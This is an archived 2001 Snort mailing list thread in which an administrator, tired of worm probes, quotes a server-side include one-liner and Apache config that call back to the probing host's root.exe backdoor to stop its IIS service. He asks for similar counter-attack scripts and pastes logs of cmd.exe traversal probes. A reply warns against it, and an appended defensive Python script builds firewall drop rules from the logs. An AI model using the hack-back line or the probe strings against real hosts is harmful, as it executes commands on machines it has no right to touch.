Snort mailing list archives
RE: Shut them down, I have had enough...
From: Klimarchuk John <JKLIMARCHUK () TyComLtd com>
Date: Wed, 19 Sep 2001 06:30:19 -0400
Why don't you just set your firewall to drop all packets coming from that or those IP addresses? Remember, if you send a DDoS to that or those servers, you are just as guilty as those administrators of not doing due diligence. Depending on the damage and downtime associated with your proposed DDoS, YOU can be held liable. I don't think your company would like that too much!

-----Original Message-----
From: Franki [mailto:franki () gshop com au]
Sent: Wednesday, September 19, 2001 3:03 AM
To: snort-users () lists sourceforge net
Subject: [Snort-users] Shut them down, I have had enough...

Hi all,

I have seen in the past a PHP script that would shut down infected IIS servers that are trying to infect Linux boxes. I haven't done it, because I didn't really think it was that nice a thing to do...

This is the one I saw:
1) Create a file called default.ida, and in it add this (on one line, if it wraps in your mail client):

    <!--#exec cmd="lynx -source http://$REMOTE_ADDR/scripts/root.exe?/c+iisreset+/stop"-->

2) Then in your httpd.conf or similar, add this:

    AddType text/html .ida
    AddHandler server-parsed .ida
But I checked my personal server this morning and the httpd error log looks like this (see the end of the email). Anyway, I'd like to set up the server to shut down any IIS box that asks for cmd.exe or root.exe. Does anyone know how this can be done using either Perl or PHP? Has anyone already done it? If so, where can I find it?

I am tired of this. I have very limited bandwidth, and even if it isn't doing any damage, it's chewing up the bandwidth and costing me money. As far as I am now concerned, they have three choices: either patch their server, pay my bandwidth bill, or get their servers shut down a lot...

Any help would be much appreciated.

Regards

Frank
Perth WA

[Wed Sep 19 14:47:27 2001] [error] [client 203.47.85.202] File does not exist: /var/www/html/c/winnt/system32/cmd.exe
[Wed Sep 19 14:47:28 2001] [error] [client 203.47.85.202] File does not exist: /var/www/html/d/winnt/system32/cmd.exe
[Wed Sep 19 14:47:31 2001] [error] [client 203.47.85.202] File does not exist: /var/www/html/scripts/..%5c../winnt/system32/cmd.exe
[Wed Sep 19 14:47:33 2001] [error] [client 203.47.85.202] File does not exist: /var/www/html/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe
[Wed Sep 19 14:47:34 2001] [error] [client 203.47.85.202] File does not exist: /var/www/html/_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe
[Wed Sep 19 14:47:40 2001] [error] [client 203.47.85.202] File does not exist: /var/www/html/msadc/..%5c../..%5c../..%5c/..A../..A../..A../winnt/system32/cmd.exe
[Wed Sep 19 14:47:42 2001] [error] [client 203.47.85.202] File does not exist: /var/www/html/scripts/..A../winnt/system32/cmd.exe
[Wed Sep 19 14:48:00 2001] [error] [client 203.47.134.211] File does not exist: /var/www/html/otherwebs/epay/default.ida
[Wed Sep 19 14:48:13 2001] [error] [client 203.47.85.202] File does not exist: /var/www/html/scripts/root.exe
[Wed Sep 19 14:48:14 2001] [error] [client 203.47.85.202] File does not exist: /var/www/html/MSADC/root.exe
[Wed Sep 19 14:48:15 2001] [error] [client 203.47.85.202] File does not exist: /var/www/html/c/winnt/system32/cmd.exe
[Wed Sep 19 14:48:16 2001] [error] [client 203.47.85.202] File does not exist: /var/www/html/d/winnt/system32/cmd.exe
[Wed Sep 19 14:48:18 2001] [error] [client 203.47.85.202] File does not exist: /var/www/html/scripts/..%5c../winnt/system32/cmd.exe
[Wed Sep 19 14:48:19 2001] [error] [client 203.47.85.202] File does not exist: /var/www/html/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe
[Wed Sep 19 14:48:21 2001] [error] [client 203.47.85.202] File does not exist: /var/www/html/_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe
[Wed Sep 19 14:48:23 2001] [error] [client 203.47.85.202] File does not exist: /var/www/html/msadc/..%5c../..%5c../..%5c/..A../..A../..A../winnt/system32/cmd.exe
[Wed Sep 19 14:48:24 2001] [error] [client 203.47.85.202] File does not exist: /var/www/html/scripts/..A../winnt/system32/cmd.exe

[root@mail httpd]# tail -50 error_log
[Wed Sep 19 14:53:18 2001] [error] [client 203.47.1.130] File does not exist: /var/www/html/scripts/..%5c../winnt/system32/cmd.exe
[Wed Sep 19 14:53:18 2001] [error] [client 203.47.85.202] File does not exist: /var/www/html/scripts/..%5c../winnt/system32/cmd.exe
[Wed Sep 19 14:53:19 2001] [error] [client 203.47.1.130] File does not exist: /var/www/html/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe
[Wed Sep 19 14:53:20 2001] [error] [client 203.47.1.130] File does not exist: /var/www/html/msadc/..%5c../..%5c../..%5c/..A../..A../..A../winnt/system32/cmd.exe
[Wed Sep 19 14:53:20 2001] [error] [client 203.47.1.130] File does not exist: /var/www/html/scripts/..A../winnt/system32/cmd.exe
[Wed Sep 19 14:53:20 2001] [error] [client 203.47.85.202] File does not exist: /var/www/html/scripts/..%2f../winnt/system32/cmd.exe
[Wed Sep 19 14:53:20 2001] [error] [client 203.47.85.202] File does not exist: /var/www/html/otherwebs/ezetax/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe
[Wed Sep 19 14:53:21 2001] [error] [client 203.47.1.130] File does not exist: /var/www/html/scripts/..A?../winnt/system32/cmd.exe
[Wed Sep 19 14:53:21 2001] [error] [client 203.176.30.78] File does not exist: /var/www/html/otherwebs/ezetax/scripts/..%2f../winnt/system32/cmd.exe
[Wed Sep 19 14:53:22 2001] [error] [client 203.47.1.130] File does not exist: /var/www/html/scripts/..A../winnt/system32/cmd.exe

_______________________________________________
Snort-users mailing list
Snort-users () lists sourceforge net
Go to this URL to change user options or unsubscribe: https://lists.sourceforge.net/lists/listinfo/snort-users
Snort-users list archive: http://www.geocrawler.com/redir-sf.php3?list=snort-users
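The firewall-side response John suggests above, as an added example that is not part of the thread and not code from either poster: a Python script that parses Apache 1.3 error_log lines of the shape Frank posted, tallies the worm probe indicators visible in them (the cmd.exe directory-traversal variants, the root.exe backdoor check and the default.ida request, the signature of the Nimda/Code Red II outbreak of that week) per client IP, and emits iptables DROP rules for hosts that exceed a threshold, instead of running anything on the infected server. The sample log is constructed from a subset of the entries in the post plus one benign request; the indicator names, the threshold and the iptables rule form are assumptions of this example.

```python
import re
from collections import defaultdict

# Constructed sample: a subset of the error_log lines from the post plus one
# benign 404 from an RFC 1918 address, so the negative case is exercised too.
SAMPLE_LOG = """\
[Wed Sep 19 14:47:27 2001] [error] [client 203.47.85.202] File does not exist: /var/www/html/c/winnt/system32/cmd.exe
[Wed Sep 19 14:47:31 2001] [error] [client 203.47.85.202] File does not exist: /var/www/html/scripts/..%5c../winnt/system32/cmd.exe
[Wed Sep 19 14:48:00 2001] [error] [client 203.47.134.211] File does not exist: /var/www/html/otherwebs/epay/default.ida
[Wed Sep 19 14:48:13 2001] [error] [client 203.47.85.202] File does not exist: /var/www/html/scripts/root.exe
[Wed Sep 19 14:53:18 2001] [error] [client 203.47.1.130] File does not exist: /var/www/html/scripts/..%5c../winnt/system32/cmd.exe
[Wed Sep 19 14:53:20 2001] [error] [client 203.47.85.202] File does not exist: /var/www/html/scripts/..%2f../winnt/system32/cmd.exe
[Wed Sep 19 14:53:21 2001] [error] [client 203.176.30.78] File does not exist: /var/www/html/otherwebs/ezetax/scripts/..%2f../winnt/system32/cmd.exe
[Wed Sep 19 14:53:22 2001] [error] [client 203.47.1.130] File does not exist: /var/www/html/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe
[Wed Sep 19 14:55:00 2001] [error] [client 10.0.0.5] File does not exist: /var/www/html/favicon.ico
"""

# Apache 1.3 error_log "File does not exist" line, as shown in the post
# (assumed format of this example; other error_log entries are ignored).
LINE_RE = re.compile(
    r"^\[(?P<ts>[^\]]+)\] \[error\] \[client (?P<ip>\d{1,3}(?:\.\d{1,3}){3})\] "
    r"File does not exist: (?P<path>\S+)$"
)

# Indicators taken from the requested paths in the post. The names are this
# example's own. Order matters: the first matching indicator wins.
INDICATORS = (
    ("code-red-ida", re.compile(r"/default\.ida$", re.I)),     # .ida overflow probe
    ("root-exe-backdoor", re.compile(r"/root\.exe$", re.I)),   # backdoor left on infected IIS
    ("cmd-exe-traversal", re.compile(r"cmd\.exe$", re.I)),     # IIS traversal to cmd.exe
)


def parse_line(line):
    """Return {'ts', 'ip', 'path'} for a matching error_log line, else None."""
    m = LINE_RE.match(line.strip())
    return m.groupdict() if m else None


def classify(path):
    """Map a requested path to an indicator name, or None if it looks benign."""
    for name, rx in INDICATORS:
        if rx.search(path):
            return name
    return None


def summarize(lines):
    """Count indicator hits per client IP: {ip: {indicator: count}}."""
    hits = defaultdict(lambda: defaultdict(int))
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue  # unrelated entries or garbage: skip, never raise
        kind = classify(rec["path"])
        if kind is not None:
            hits[rec["ip"]][kind] += 1
    return {ip: dict(kinds) for ip, kinds in hits.items()}


def drop_rules(summary, threshold=2):
    """iptables DROP rules for every IP with at least `threshold` probe hits.

    Dropping at the firewall, as suggested in the reply, stops the bandwidth
    drain without touching the remote host. The threshold and the rule form
    are assumptions of this example.
    """
    return [
        "iptables -I INPUT -s %s -j DROP" % ip
        for ip, kinds in sorted(summary.items())
        if sum(kinds.values()) >= threshold
    ]


if __name__ == "__main__":
    summary = summarize(SAMPLE_LOG.splitlines())
    for ip, kinds in sorted(summary.items()):
        print(ip, kinds)
    print("\n".join(drop_rules(summary)))
```

On a live box the same functions can be fed `tail -f error_log`; a host that sends a single default.ida probe stays below the default threshold, while a host that cycles through the traversal variants is dropped after its second hit.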
Current thread:
- Shut them down, I have had enough... Xno Xutz (Sep 19)
- <Possible follow-ups>
- RE: Shut them down, I have had enough... Klimarchuk John (Sep 19)
- RE: Shut them down, I have had enough... Franki (Sep 19)
- RE: Shut them down, I have had enough... John Berkers (Sep 19)
- Re: Shut them down, I have had enough... Jason Costomiris (Sep 19)
- RE: Shut them down, I have had enough... Franki (Sep 19)